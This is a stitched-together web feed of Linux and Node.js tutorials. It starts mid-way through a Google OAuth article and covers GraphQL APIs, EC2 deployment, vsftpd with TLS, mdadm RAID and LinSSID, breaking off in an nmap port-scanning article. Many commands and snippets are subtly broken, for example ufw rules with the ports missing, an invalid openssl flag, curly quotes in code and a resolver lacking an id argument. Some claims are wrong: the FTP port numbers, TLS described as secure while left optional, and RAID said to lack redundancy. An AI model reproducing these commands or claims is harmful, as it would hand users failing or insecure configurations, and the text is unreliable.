  passport.authenticate(‘google’, {failureRedirect: ‘/}),

  (req, res) =>

  {

    res.redirect(/success’);

  }

);


// running server


app.listen(PORT, () =>

{

  console.log(“Server is running on Port ” + PORT)

})

Testing Google OAuth

Now our application is ready, and we can test whether it authorizes the users using google oauth. Go to the root directory and run the application.

ubuntu@ubuntu:~$ node index.js

Now enter the url of your application into the browser.

http://localhost:8000

It shows the home page with an anchor tag.

When we click on the ‘Authorize Here’, it will redirect to the google oauth page.

Your application name ‘Test’ is displayed on the Google authentication page. When you authorize your account, it will take you to the authorized page.

Conclusion

Managing usernames and passwords for different web applications is not a happy task for users. Many users leave your web application without registering their account just because they do not want to manage credentials. The authorization process on your web application or website can be simplified by using third-party services like Google, Facebook, etc. These services authorize users on their behalf, and the user does not need to manage credentials separately. In this article, we have implemented the google oauth protocol to authorize users to use Node.js.

]]>
Introduction to Making GraphQL APIs and Apps in Node.js https://linuxhint.com/graphql-apis-apps-node-js/ Sun, 24 Jan 2021 23:02:11 +0000 https://linuxhint.com/?p=87550

The communication and data transfer between the front end and backend of any application occurs through APIs (Application Programming Interface). There are many different types of APIs used to communicate between the front and back-end applications like RESTful API, SOAP API, GraphQL API, etc. The GraphQL API is a relatively new technology, and it is much faster than other types of APIs available. Fetching data from the database using GraphQL api is much faster than the REST API. While using GraphQL API, the client has control to fetch only the required data instead of getting all the details; that is why GraphQL API works faster than REST API.

Installing Packages

We will build a node.js application using GraphQL API, so we need to install node.js and npm for this before starting the project.

ubuntu@ubuntu:~$ sudo apt-get update -y

ubuntu@ubuntu:~$ sudo apt-get install nodejs

ubuntu@ubuntu:~$ sudo apt-get install npm

Setting up Project

We will use the ‘express’ framework from node.js to build our application. Create a directory named ‘graphql’ and initiate the project.

ubuntu@ubuntu:~$ mkdir graphql

ubuntu@ubuntu:~$ cd graphql/

ubuntu@ubuntu:~$ npm init -y

MongoDB Setup

In our GraphQL project, we will use MongoDB as our database. MongoDB is a schemaless database and stores data in the form of key pairs. In order to install mongoDB, follow the given steps.

Import the public GPG key for MongoDB.

ubuntu@ubuntu:~$ wget -qO - https://www.mongodb.org/static/pgp/server-4.4.asc | sudo apt-key add -


Create the list file for mongodb.

ubuntu@ubuntu:~$ echo "deb [ arch=amd64,arm64 ] https://repo.mongodb.org/apt/ubuntu bionic/mongodb-org/4.4 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-4.4.list

Update local repositories.

ubuntu@ubuntu:~$ sudo apt-get update -y

Install mongodb package.

ubuntu@ubuntu:~$ sudo apt-get install -y mongodb-org

Start and enable mongod.service.

ubuntu@ubuntu:~$ sudo systemctl start mongod.service

ubuntu@ubuntu:~$ sudo systemctl enable mongod.service

Installing npm Modules

For our GraphQL application, we need to install some npm packages. We will install cors, express, body-parser, mongoose, etc.

ubuntu@ubuntu:~$ cd graphql/

ubuntu@ubuntu:~$ npm install cors express body-parser mongoose --save

To create a GraphQL api, we need to install an extra npm package named ‘apollo-server-express.’ This npm package is used to run graphQL server with all Node.js HTTP frameworks like ‘express.’

ubuntu@ubuntu:~$ npm install apollo-server-express --save

Defining MongoDB Schema

Now we have our environment set up for our GraphQL application in Node.js, and it is time to define a schema for our application. Create a file ‘models/student.js’ in the project root directory.

// defining student schema

const mongoose = require(‘mongoose’);

const studentSchema = new mongoose.Schema({

     name: {

          type: String,

          required: true

     },

     class: {

          type: Number,

          required: true

     },

     major: {

          type: String,

          required: true

     }

}, {

     timestamps: true

});

const Student = mongoose.model(‘Student’, studentSchema);

module.exports = { Student, studentSchema }

In the above-defined schema, every student must have a name, class, and major.

Building GraphQL API

After creating the Student schema, we will now build GraphQL API. Create a ‘schema.js’ to write GraphQL parameters. There are two parameters, ‘types’ and ‘resolvers,’ used in GraphQL API. In ‘types,’ we will specify our schema, the queries (e.g., Making GET requests), and mutations (e.g., Making UPDATE or DELETE requests) to the specified schema. We will write the different methods defined in ‘types’ to link the queries and mutations with the database in ‘resolvers.’

// importing schema and module

const { gql } = require(‘apollo-server-express’);

const Student = require(‘./models/student’).Student;

// Defining Schema, Query, and Mutation Type

const typeDefs = gql `

   type Student {

      id: ID!,

      name: String!,

      class: Int!,

      major: String!

   }


   type Query {

      getStudents: [Student],

      getStudentById(id: ID!): Student

   }


   type Mutation {

      addStudent( name: String!, class: Int!, major: String! ): Student

      updateStudent( name: String!, class: Int!, major: String! ): Student

      deleteStudent( id: ID! ): Student

   }`


// Defining Resolvers


const resolvers = {

   Query: {

      getStudents: (parent, args) => {

         return Student.find({});

      },

      getStudentById: (parent, args) => {

         return Student.findById(args.id);

      }

   },

   Mutation: {

      addStudent: (parent, args) => {

         let student = new Student({

            name: args.name,

            class: args.class,

            major: args.major

         });

         return student.save();

      },

      updateStudent: (parent, args) => {

         if(!args.id) return;

         return Student.findOneAndUpdate({

            _id: args.id

         },

         {

            $set: {

               name: args.name,

               class: args.class,

               major: args.major

            }

         },

         { new: true }, (err, Student) => {

            if(err) {

               console.log(err);

            } else {};

         })

      }

   }

}


module.exports = {

   typeDefs,

   resolvers

}

Creating GraphQL API Server

Now we are almost done creating the GraphQL Application. The only step left is to create the server. Create a file named ‘app.js’ to configure server parameters.

// importing required packages


const express = require(‘express’);

const mongoose = require(‘mongoose’);

const bodyParser = require(‘body-parser’);

const cors = require(‘cors’);

const { ApolloServer } = require(‘apollo-server-express’);


// importing schema


const { typeDefs, resolvers }= require(‘./schema’);


// connecting to MongoDB


const url = “mongodb://127.0.0.1:27017/students”;

const connect = mongoose.connect(url, { useNewUrlParser: true });

connect.then((db) => {

   console.log('Connection Successful');

}, (err) => {

   console.log(err);

});


// creating server


const server = new ApolloServer({

   typeDefs: typeDefs,

   resolvers: resolvers

});

const app = express();

app.use(bodyParser.json());

app.use(*, cors());

server.applyMiddleware({ app });

app.listen( 8000, () =>

{

   console.log('listening to 8000');

})

Testing the GraphQL API

We have our graphQL server up and running on port 8000, and it is time to test the GraphQL API. Open the GraphQL webpage in the browser by visiting the following url.

http://localhost:8000/graphql

And it will open the following webpage.


Add the student to the database using graphQL API.


Similarly, add more students, and after adding the student, get all the students using GraphQL API.


Note the ID of any of the Students and get the specific student using its id.

Conclusion

Fetching data from the database using the standard REST API makes the query slow as sometimes we get more data than required. Using GraphQL, we can fetch exactly the required data that makes the GraphQL API faster. In this demo project, we only have a single schema, so we have created GraphQL API for that single schema. Also, we have defined three to four methods for the schema. You can create more than one query or mutations according to your application.

]]>
How to Deploy GraphQL Application Using Node.js on EC2 Server https://linuxhint.com/deploy-graphql-application-ec2-server/ Wed, 20 Jan 2021 10:06:36 +0000 https://linuxhint.com/?p=86891 GraphQL, also known as Graph Query Language, established and maintained by Facebook, is a query language used for APIs. It is built using JavaScript, Scala, Java, and Ruby programming languages. Its basic purpose is to ask for the data from server to client.GraphQL aggregates the data from different sources. Aggregation is the process of filtering data on the server side and then sending the filtered data to the client. Without aggregation, we send all the data to the client, and then the data is filtered at the client-side. This makes the system slow, and we can improve the efficiency of an API by using GraphQL. Here we will learn to deploy a simple GraphQL application using node.js on an EC2 server.

Installing Required Packages

The first step to deploy your graphQL application is to ready your server by installing the required packages. Log in to the server using SSH.

ubuntu@ubuntu:~$ ssh ubuntu@IPAdress -i KeyPair.pem

NOTE: Make sure the security group of the instance is configured to allow connection from port 22 and the private key file has 400 permission.

Update Ubuntu repositories.

ubuntu@ubuntu:~$ sudo apt-get update -y

Now install node.js and npm on your ubuntu server.

ubuntu@ubuntu:~$ sudo apt-get install nodejs -y
ubuntu@ubuntu:~$ sudo apt-get install npm -y

Verify the installation by checking the version of node.js and npm.

ubuntu@ubuntu:~$ node -v
ubuntu@ubuntu:~$ npm -v

Move GraphQL Application to EC2 Server

The EC2 instance is ready to deploy graphQL applications in node.js. Now we will move our code to the EC2 instance. Two common ways to copy the code to the server are listed below and will be discussed here.

  • Copy code using scp command
  • Clone application code from Github, Gitlab, or Bitbucket

Copy Application Using scp Command

In order to copy your application to the EC2 server using the scp command, First of all, remove the ‘node_modules’ directory from your graphQL application. This directory has all the npm packages required to run the application. We will install these packages later before starting the graphQL application. Now compress the project directory into a zip file. After creating the zip file, we will move the project zip file to the server. Linux and windows have different methods to create a zip file.

Windows

In windows, right-click on the application root directory and go to the ‘send to’ option. It will open a submenu. Click on the ‘Compressed (zipped) folder’ to create a zip file of the graphQL application.

Linux or Mac

In Linux or Mac OS, we will use the ‘zip’ command to create a zip file of the project.

ubuntu@ubuntu:~$ zip -r graphQL.zip graphQL

The above command will generate the graphQL.zip file of the graphQL directory.

Upload Application to the Server

Now we have a zip file of our application, and we can upload the zip file to the server by using the scp command.

ubuntu@ubuntu:~$ scp -i KeyPair.pem graphQL.zip ubuntu@IPAddress:~/

The above command will move the project zip file to the remote server’s home directory over the ssh connection. Now on the remote server, unzip the project zip file.

ubuntu@ubuntu:~$ unzip graphQL.zip

Clone Application From Github, Bitbucket or Gitlab

The second method to copy application code to the server is using git. Install git from the command line on the EC2 server.

ubuntu@ubuntu:~$ sudo apt install git

Check the git version to verify the installation.

ubuntu@ubuntu:~$ git --version

If it does not give the version of git, then git is not installed. Now clone the application from the github, gitlab, or bitbucket. Here we will clone the application code from the github.

ubuntu@ubuntu:~$ git clone ttps://github.com/contentful/the-example-app.nodejs

Starting the GraphQL Application

Now we have our graphQL application on the remote server. Go to the root directory of the graphQL application and install the required npm packages to run the graphQL application.

ubuntu@ubuntu:~$ cd graphQL
ubuntu@ubuntu:~$ sudo npm install

This command will analyze the package.json file in the project and install all the required npm packages. After installing the required packages, now we will start the graphQL application.

ubuntu@ubuntu:~$ node app.js

Running Application as Daemon

When we run the application using the standard method as described above, it runs in the foreground, and the application stops when you close the terminal window. We can run the application as a background process by appending the ampersand (&) sign to the command.

ubuntu@ubuntu:~$ node app.js &

The problem with this method is that when we modify our application code, the applied changes will not reflect automatically. We will have to restart the application every time we modify the code to apply the changes. In order to run the application in the background and to apply changes automatically, we will use an npm package named pm2. Install pm2 on the server.

ubuntu@ubuntu:~$ sudo npm install -g pm2

Start the graphQL application using pm2.

ubuntu@ubuntu:~$ pm2 start app.js --name “graphQL” --watch

The ‘–name’ flag will name the background process, and we can start and stop the application using the name. The ‘–watch’ flag will go on checking the application code to apply changes immediately. You can learn more about pm2 by visiting the following link

https://pm2.keymetrics.io/

Querying GraphQL API from Browser

We can configure our graphQL application to make graphQL queries from the browser manually. For this, we have to create a separate HTTP endpoint on which we will mount the graphQL API server. And this HTTP endpoint will be used to make manual queries. Following is the code to create the graphQL api server endpoint.

const express = require(‘express’);
const { graphqlHTTP } = require(‘express-graphql’);
const { buildSchema } = require(‘graphql’);

const graphQLSchema = buildSchema(`
    type Query{
    message: String
    }`
);

const func = {
    message: () =>
    {
        return ‘you are using graphql api server’;
    }
};

const server = express();
server.use(/graphql’, graphqlHTTP({
    schema: graphQLSchema,
    rootValue: func,
    graphiql: true
}));

server.listen(3000);

Now, after running the server, we can access the graphQL api server on the following route.

http://localhost:3000/graphql

Querying GraphQL API Using CLI

In the previous section, we made graphQL queries from the browser using graphiql. Now we are going to make graphQL queries using the command-line interface in ubuntu. From the command line, to make an HTTP POST request, we will use the curl module.

ubuntu@ubuntu:~$ curl -X POST -H "Content-Type: application/json" -d '{"query": "{ message }"}' http://localhost:3000/graphql

Querying GraphQL API Programmatically

In order to make graphQL query programmatically, we will use the ‘node-fetch’ module in node.js. Open node.js in the terminal.

ubuntu@ubuntu:~$ node

Now make the HTTP POST request to the server using the ‘node-fetch’ module.

GraphQL is an efficient query language, and it can decrease the response time of a query made to the database. The standard api calls to fetch data from the database involve many unuseful data in the response, and hence response time increases, which decreases the efficiency. The query made to the databases using GraphQL returns only the useful data and hence decreases the response time. In this article, we have deployed our graphQL application on an EC2 instance.

]]>
How to Configure FTP with TLS in Ubuntu https://linuxhint.com/configure-ftp-tls-ubuntu/ Mon, 04 Jan 2021 13:10:42 +0000 https://linuxhint.com/?p=84099 FTP (File Transfer Protocol) is primarily used to transfer files between computers. FTP works in client-server architecture, in which the client asks for a file from the server and the server returns the required file to the client. On the client machine, the FTP client application is used to communicate with the server. It is also possible to access the FTP server on the browser. By default, FTP communicates over an insecure channel, but it is possible to configure FTP to transfer data over a secure channel. In this tutorial, you will learn how to configure an FTP server with TLS and then use FileZilla as a client application to connect with the FTP Server.

Installing VSFTPD

VSFTPD (Very Secure FTP Daemon) is a software program used to configure FTP on a server. In this tutorial, VSFTPD will be used to configure the FTP server on the machine. Before installing VSFTPD, update the repositories in your server by issuing the following command.

ubuntu@ubuntu:~$ sudo apt-get update -y

Next, install VSFTPD using the following command.

ubuntu@ubuntu:~$ sudo apt-get install vsftpd -y

Finally, verify the installation by checking the version of vsftpd with the following command.

ubuntu@ubuntu:~$ vsftpd -v

The above command will output the version of vsftpd if the installation is successful.

FTP in Active Mode

In Active mode, the FTP client starts the session by establishing the TCP control connection from any random port on the client machine to port 21 of the Server. Then, the client starts listening on a random port X for a data connection and informs the server via TCP Control connection that the client is waiting for the data connection on port X. After this, the server establishes a data connection from its port 20 to the port X on the client machine.

A problem can arise where the client is behind a firewall and port X is blocked. In this case, the server is not able to establish a data connection with the client. To avoid this problem, the FTP server is mostly used in Passive mode, which we will discuss later in this article. By default, VSFTPD uses Passive mode, so we will have to change it to Active mode.

First, open the VSFTPD configuration file.

ubuntu@ubuntu:~$ sudo nano /etc/vsftpd.conf

Add the following line to the end of the file.

pasv_enable=NO

Also, be sure that the ‘connect_from_port_20’ option is set to ‘YES.’ This option ensures that the data connection is established on port 20 of the server.

Next, create a directory that the FTP server will use to store files. For this tutorial, we will configure ‘/home/ubuntu/ftp/’ as the root path for the FTP server.

ubuntu@ubuntu:~$ sudo mkdir /home/ubuntu/ftp

Now, specify this directory in the configuration file by changing the ‘local_root’ option. The following parameter will configure the root path of the server.

local_root=/home/ubuntu/ftp

The ‘write_enable’ option must be enabled to allow users to write to the FTP server.

Every time you change the configuration file, always restart the server.

ubuntu@ubuntu:~$ sudo systemctl restart vsftpd

Setting a Password for a User

The FTP client connects with the server using a username and password. Set the password for your user on the machine using the following command.

ubuntu@ubuntu:~$ sudo passwd ubuntu

The above command will ask for the password for the ‘ubuntu’ user.

Configuring the Firewall for Active Mode

If FTP is used in Active mode, the FTP server will use two ports to communicate with the client, ports 21 and 22. Port 21 is used to pass commands to the client, and Port 20 is used to transfer data to any random port of the client. We will use ufw to configure the firewall on the server. Install ufw using the following command.

ubuntu@ubuntu:~$ sudo apt-get install ufw

Now, on the server side, we will open ports 20, 21, and 22 (for the SSH connection).

ubuntu@ubuntu:~$ sudo ufw allow from any to any port  proto tcp

Enable and check the status of ufw using the following commands.

ubuntu@ubuntu:~$ sudo ufw enable

ubuntu@ubuntu:~$ sudo ufw status

NOTE: if you are configuring your FTP server on the cloud, you will also need to allow ports 20, 21, and 22 in the security group.

WARNING: Always enable port 22, along with the required ports, before enabling ufw on the remote system. By default, UFW blocks traffic from port 22, so you will not be able to access your remote server using SSH if you enable ufw without allowing traffic from port 22.

Installing the FTP Client

Now, our server is configured in Active mode, and we can access it from the client side. For the client application, we will use FileZilla, an ftp client application. Install FileZilla using the following command.

ubuntu@ubuntu:~$ sudo apt-get install filezilla -y

Open the FTP client application and enter the public IP address and other credentials of the FTP server.

When you click ‘Quickconnect,’ you will connect to the FTP server and automatically be taken to the directory specified in the ‘local_root’ option in the ‘/home/ubuntu/ftp’ configuration file.

Problems in Active Mode

Using FTP in Active mode raises problems when the client is behind the firewall. After inputting the initial control commands, when the server creates a data connection with the client on a random port, the port may be blocked by the firewall on the client, causing the data transfer to fail. FTP can be used in Passive mode to resolve these firewall problems.

FTP in Passive Mode

In Passive mode, the client creates a control connection with the server on port 21 of the server. The client then sends the special ‘PASV’ command to inform the server that the data connection will be established by the client instead of the server. In response, the client receives the server IP and random port number (this port number will be configured on the server). The client uses this IP and port number to create a data connection with the server. In Passive mode, both the data and control connections are established by the client, so that the firewall does not disturb the communication between the client and the server.

Open the FTP configuration file in your favorite editor.

ubuntu@ubuntu:~$ sudo nano /etc/vsftpd.conf

Set the ‘pasv_enable’ option to ‘YES’ in the file so that the server can communicate with the client in Passive mode. Also, set the ‘local_root’ option to specify the root directory of the server and set the ‘write_enable’ option to ‘YES’ to allow users to upload files to the server.

As previously discussed, the data connection is established by the client, and the server sends its public IP and a random port to the client to create a data connection. This random port on the server can be specified from a range of ports in the configuration file.

The data connection between the server and the client will be established on a port between 1024 and 1048. Restart the FTP server after changing the configuration file.

ubuntu@ubuntu:~$ sudo systemctl restart vsftpd

Configuring the Firewall in Passive Mode

If we use FTP in Passive mode, the data connection will be established over any port from 1024 to 1048, so it is necessary to allow all these ports on the FTP server.

ubuntu@ubuntu:~$ sudo ufw allow from any to any port  proto tcp

After allowing all the ports on the firewall, activate the ufw by running the following command.

ubuntu@ubuntu:~$ sudo ufw enable

Always allow ports on the server before enabling the firewall; otherwise, you will not be able to access your server via SSH as ufw, which blocks port 22 by default.

Testing the Connection

Now, we have set up the FTP server in Passive mode and can check the ftp connection with the client application. Open FileZilla in your system to do so.

After entering the host, username, password, and port, now you can connect with your server. Now that you are connected to the FTP server running in Passive mode, you can upload files to the server.

Configuring SSL Certificates with the FTP Server

By default, the FTP server establishes the connection between the client and the server over an unsecured channel. This type of communication should not be used if you wish to share sensitive data between the client and the server. To communicate over a secure channel, it is necessary to use SSL certificates.

Generating SSL Certificates

We will use SSL certificates to set up secure communication between the client and the server. We will generate these certificates using openssl. The following command will generate SSL certificates for your server.

ubuntu@ubuntu:~$ sudo openssl req -x509 -nodes -day 365 -newkey rsa:2048 -keyout /etc/ssl/private/vsftpd.pem -out /etc/ssl/private/vsftpd.pem

When you run the above command, you will be asked some questions. After you answer these questions, the certificates will be generated. You can check for the certificates in the terminal.

ubuntu@ubuntu:~$ sudo ls /etc/ssl/private/

Using Certificates in the Configuration File

Now, our certificates are ready to use. We will configure the ‘vsftpd.conf’ file to use the SSL certificates for communication. Open the configuration file with the following command.

ubuntu@ubuntu:~$ sudo nano /etc/vsftpd.conf

Add the following lines to the end of the files. These changes will ensure that the FTP server uses the newly generated SSL certificates to communicate securely with the client.

ssl_enable=YES
force_local_data_ssl=NO
force_local_logins_ssl=NO
ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO
rsa_cert_file=/etc/ssl/private/vsftpd.pem
rsa_private_key_file=/etc/ssl/private/vsftpd.pem

Restart the FTP server to apply these changes.

ubuntu@ubuntu:~$ sudo systemctl restart vsftpd

After restarting the server, try connecting with your server using the FileZilla client application. This time, the client application will ask you whether to trust these certificates.

If you have certificates from a trusted certificates authority, then this warning should not appear. We generated our certificates using openssl, which is not a trusted certificates authority, which is why it asked for certificate authentication in our case. Now, we can communicate between the client and the server over a secure channel.

Anonymous Configuration

You can also enable anonymous login on your FTP server. With this configuration enabled, any user can log into the FTP server with any username and password. The following parameters in the configuration file will make the FTP server accessible anonymously.

The above configuration sets the root path for anonymous users to be ‘/home/ubuntu/ftp/anon’ and it will not prompt for the password when an anonymous user logs in.

NOTE: Ensure that the ‘/home/ubuntu/ftp/anon’ path exists on the FTP server.

Now, restart the FTP server.

ubuntu@ubuntu:~$ sudo systemctl restart vsftpd

After restarting the server, we will try to connect to the server via the Google Chrome Browser. Go to the following URL.

ftp://3.8.12.52

The above URL will take you to the FTP server’s root directory, as specified in the configuration file. With Anonymous login disabled, when you try to connect to the FTP server using a browser, you will first be asked for authentication, and then you will be taken to the root directory of the server.

Configure Local Access

We can also allow or block local access to the FTP server by changing the configuration file. Currently, we can access our FTP server locally without using the FTP client application, but we can block this access. To do so, we must modify the ‘local_enable’ parameter.

First, restart the FTP server.

ubuntu@ubuntu:~$ sudo systemctl restart vsftpd

After restarting the server, try to access the FTP server locally by using the command-line interface. Log into your remote server using SSH.

ubuntu@ubuntu:~$ ssh ubuntu@3.8.12.52 -i

Now, issue the following command to log into the FTP server locally using the command-line interface.

ubuntu@ubuntu:~$ ftp localhost

When you run the above command, it will throw a 500 error.

Conclusion

File Transfer Protocol has been used for many years to transfer files and documents over the Internet. VSFTPD is one of the packages used as an FTP server on your machine. VSFTPD contains various configurations that you can use to customize your FTP server. This tutorial showed you how to configure an FTP server with TLS for enhanced security. To learn more about FTP configurations, visit the following link.

http://vsftpd.beasts.org/vsftpd_conf.html ]]> How to create RAID arrays using MDADM on ubuntu https://linuxhint.com/create-raid-arrays-using-mdadm-ubuntu/ Mon, 28 Dec 2020 08:22:56 +0000 https://linuxhint.com/?p=83412 RAID is a virtualization platform for data storage that integrates several physical disc drives into one or more logical units. Based on the required level of reliability and efficiency, data is scattered across the drives in one of many ways, referred to as RAID levels. Different systems are known as ‘RAID’ followed by an integer, such as RAID 0 or RAID 1. Each system, or level of RAID, provides a different balance between the key goals, i.e. stability, usability, performance, and strength.

RAID uses disc mirroring or disc striping methods, mirroring on more than one drive would copy similar data. Partition striping allows distributing data across many disc drives. The storage capacity of each drive is split into units that range from a sector (512 bytes) up to multiple megabytes. RAID levels higher than RAID 0 offer protection against unrepairable read errors in the field, as well as against entire physical drive failures.

The RAID devices are deployed via the application driver md. The Linux software RAID array currently supports RAID 0 (strip), RAID 1 (mirror), RAID 4, RAID 5, RAID 6, and RAID 10. Mdadm is a Linux utility used to control and manage RAID devices for applications. Several core operating modes of mdadm are assembled, build, create, follow, monitor, grow, incremental and auto-detect. The name derives from the nodes of the multiple devices (md) that it controls or manages. Let’s look at creating different kinds of Raid arrays using mdadm.

Creating a RAID 0 array:

RAID 0 is the mechanism by which data is separated into blocks, and those blocks are scattered through various storage devices like hard drives. Means that each disc holds a portion of the data and while accessing that data, several discs would be referenced. In raid 0, as blocks are striped, its performance is excellent, but due to no mirroring strategy, a single failure of the device would destroy all the data.

In order to get started, you have to first identify the component devices by using the following command:

ubuntu@ubuntu:~$ lsblk -o NAME, SIZE, TYPE

We have two discs without a filesystem, each 50G in size, as we can see from the screenshot. In this case, the identifiers /dev/ch1 and /dev/ch2 were given to these devices for this session. These are raw components that we are going to use to create the array.

To use these components to create a RAID 0 array, specify them in –create command. You’ll need to define the system name that you want to build (in our case, /dev/mch0), the RAID level, i.e. 0, and the number of devices:

ubuntu@ubuntu:~$ sudo mdadm --create --verbose /dev/mch0 --level=0
--raid-devices=2 /dev/ch1 /dev/ch2

By testing the /proc/mdstat log, we can guarantee that the RAID was created successfully:

ubuntu@ubuntu:~$ cat /proc/mdstat

The /dev/mch0 system has been created with the /dev/ch2 and /dev/ch1 devices in the RAID 0 setup. Now mount the file system on that array using the following command:

ubuntu@ubuntu:~$ sudo mkfs.ext4 -F /dev/mch0

Now, Create a mount point and mount the filesystem by the following commands:

ubuntu@ubuntu:~$ sudo mkdir -p /mnt/mch0
ubuntu@ubuntu:~$ sudo mount /dev/mch0 /mnt/mch0

Check if there is any new space available or not:

ubuntu@ubuntu:~$ df -h -x devtmpfs -x tmpfs

Now we have to change the /etc/mdadm/mdadm.conf file to make sure the list is automatically reassembled at boot. You will search the current array automatically, connect the file and update the initial RAM filesystem by the following sequence of commands :

ubuntu@ubuntu:~$ sudo mdadm --detail --scan | sudo tee -a /etc/mdadm/mdadm.conf
ubuntu@ubuntu:~$ sudo update-initramfs -u

In order to mount automatically at boot, add new file system mount options in etc/fstab file available:

Each boot can now automatically add your RAID 0 array and mount it.

Creating a RAID 5 array:

Raid 5 arrays are created by stripping the data along with various devices. A measured parity block is one part of each stripe. The parity block and the remaining blocks will be used to determine the missing data in case the device fails. The system obtaining the parity block is rotated such that there is a balanced sum of parity information for each device. While the info about parity is shared, the storage value of one disc can be used for parity. When in a damaged state, RAID 5 will suffer from very poor results.

For creating the RAID 5 array, we have to first identify the component devices as we identified in RAID 0. But in RAID 5 we should have at least 3 storage devices. Find the identifiers for these devices by using the following command:

ubuntu@ubuntu:~$ lsblk -o NAME, SIZE, TYPE

Use the –create command to create a RAID 5 array but use the value 5 for “level” in this case.

ubuntu@ubuntu:~$ sudo mdadm --create --verbose /dev/md0 --level=5
--raid-devices=3 /dev/sda /dev/sdb /dev/sdc

This can take a certain time to complete, even during this time, the array may be used. By testing the /proc/mdstat log, you can track the progress of creation:

ubuntu@ubuntu:~$ cat /proc/mdstat

Now, create and mount the filesystem on the array by executing the following sequence of commands:

ubuntu@ubuntu:~$ sudo mkfs.ext4 -F /dev/md0
ubuntu@ubuntu:~$ sudo mkdir -p /mnt/md0
ubuntu@ubuntu:~$ sudo mount /dev/md0 /mnt/md0

After mounting this, you can confirm whether it is accessible or not::

ubuntu@ubuntu:~$ df -h -x devtmpfs -x tmpfs

For automatic assembling and mounting of RAID 5 arrays at each boot, you have to adjust the initramfs and add the recently created filesystem to fstab file by executing these commands:

Conclusion:

RAID provides efficiency and stability by combining multiple hard drives together. In that way, it gives the system one large capacity hard drive with a much better speed than normal partitioned drives. On the other hand, it doesn’t facilitate redundancy and fault tolerance, and in case, one drive fails all of the data is lost.

]]>
How to use LinSSID on Linux for wireless scanning https://linuxhint.com/wireless-scanning-linssid/ Sat, 26 Dec 2020 11:58:53 +0000 https://linuxhint.com/?p=83032 We all prefer to find the most suited, wireless channel from our Wi-Fi network. The most recommended way is to configure your routers to automatically determine the optimal channel number that depends on periodic frequency analysis. However, there are ways to scan your Wi-Fi network and determine the optimal channel that lies within the range of your network adapter.

With the help of modern utilities, it’s easy to determine the Wi-Fi signal from the access point to the room. One among many of these utilities is LinSSID. It is an open-source Wifi-Analyzer tool that is written in C++ using Linux wireless tools and Qt4, Qt5, Qwt 6.1, etc. It has a graphical interface that shows nearby wireless routers and ad-hoc connections. LinSSID interface is similar in appearance and functionality to the Windows Wi-Fi network analyzer (Insider).

By default, the Ubuntu network-manager identifies all wireless networks and allows you to connect with one manually. However, with the help of this utility, you can check the nearest networks along with the number of radio channels used by them. Moreover, this app does not only inform you about the strength of your Wi-Fi network but also the strength and frequency of other Wi-Fi signals. This information allows you to choose the less congested radio channel and the strength of radio signals in different places of your home.

Features:

  • Display details of locally receivable attach points in a tabular form.
  • Speed can be altered according to the needs, with real-time updates.
  • Provide details with columns regarding many different options.
  • Graphically demonstrates signal strength by channel and overtime.
  • Displayed columns can be customized and are portable.
  • Displays AP bandwidth.
  • User-friendly.

Installation:

There are various ways for LinSSID installation. You can either install LinSSID from the source packages available on the LinSSID page, or you can use PPA for DEB-based systems like Ubuntu and LinuxMint, etc. In this tutorial, we will use PPA for LinSSID installation.

For this purpose, you will need to add LinSSID PPA by typing

ubuntu$ubuntu:~$ sudo add-apt-repository ppa:wseverin/ppa

Now update ubuntu and install LinSSID.

ubuntu$ubuntu:~$ sudo apt-get update
ubuntu$ubuntu:~$ sudo apt install linssid -y

LinSSID uses wireless tools that require root privileges. You can either run it as a root or access it as an ordinary user by using the gksudo program to launch LinSSID.

In order to run as an ordinary user, you must set the SUDO system using visudo and then call the gksudo program.

ubuntu$ubuntu:~$ sudo visudo

We will use visudo as root to configure the file /etc/sudoers. Now add the “user ALL=/usr/bin/linssid” line at the end of the file to grant root access to LinSSID.

Now start LinSSID using command “gksudo linssid”.

It’s suggested to not edit the file directly as visudo performs syntax check before configuration.

You can also launch the program from the menu. Once run, It will prompt for the password.

Once it’s launched, choose the interface with which you connect to your wireless network.

Now click the Play button to search all the available Wi-Fi networks in your computer range. The graphical interface displays a wide range of information, including:

  • SSID
  • MAC Address
  • Channel
  • Signal Strength
  • Protocol
  • Speed
  • Noise
  • Security (if it is encrypted)
  • Frequency, etc

It’s important to note that not all the above information is available by default. Go to the main menu and click View to enable/disable fields as per your requirement. In addition, it also allows switching between Wi-Fi devices and altering automatic scanning intervals.

Now use the tool to check the signal levels at various locations of your home. You can check the signal level of neighborhood LANs. Now choose the channel that has the maximum strength and is connected with the least number of routers. The main functionality of this application is that it locates and measures the strength of each wireless network from your device. Hence, it gives you a lot of control and choice over which network to connect to.

Another advantage it provides is its compatibility with most of the GPS cards. Thus it shows the location of all available wireless networks, which combined with signal power analysis allows network managers to locate any network errors. However, you need to have GPS and Wi-Fi cards to utilize the GPS features and use this application.

Conclusion:

In this article, we have covered the basic working and understanding of wifi analyzing utility for unix systems, LinSSID. The provision of the user-friendly tool in Linux offers wireless scanning and Wifi performance analysis. The shared details in this article display user convenience, as its interface is ordinary and functional, as all the essential choices are apparent at a glance. It’s the best-suited utility for selecting appropriate wireless network channels and can be of a lot of help for network managers to locate any signal problems. In the meantime, as per its developers, it’s developed only for Ubuntu 12.04 plus and supports 64-bit versions. However, you can also have a look at some open-source alternatives for comparison.

]]>
How to Find Open Ports on Ubuntu? https://linuxhint.com/how-to-find-open-ports-on-ubuntu/ Mon, 14 Dec 2020 23:27:31 +0000 https://linuxhint.com/?p=81693 To troubleshoot a network and maintain the security of the server, a network administrator or a security professional must be aware of the tools used to find open ports on the server. Linux provides different utilities and command line options to list open ports on the server. In this tutorial, we are going to see how we can list all the open ports using different commands in the Ubuntu terminal.

What Does Open Port Mean?

Before going deeper into checking open ports, let’s first know what open ports mean. An Open Port or a listening port is the port in which some application is running. The running application listens on some port, and we can communicate with that application over that listening port. If an application is running on a port, and we try to run another application on the same port, the kernel will throw an error. That is one of many reasons we check for open ports before running applications.

List Open Ports Using nmap

Network Mapper, known as nmap, is an open source and free tool, which is used to scan ports on a system. It is used to find vulnerabilities, discover networks, and find open ports. In this section, we will use nmap to get a list of open ports on a system. First of all, update cache on Ubuntu before installing nmap:

ubuntu@ubuntu:~$ sudo apt-get update -y

Nmap can be installed using the following command in the terminal:

ubuntu@ubuntu:~$ sudo apt-get install nmap -y

After installing nmap, verify the installation by checking the version of the nmap:

ubuntu@ubuntu:~$ nmap --version

If it gives the version of nmap, then it is installed perfectly, otherwise, try the above commands again to install nmap properly. Nmap is used to perform several related to networks, and port scanning is one of those tasks. The nmap tool is used along with many options. We can get the list of all the available options by using the following command:

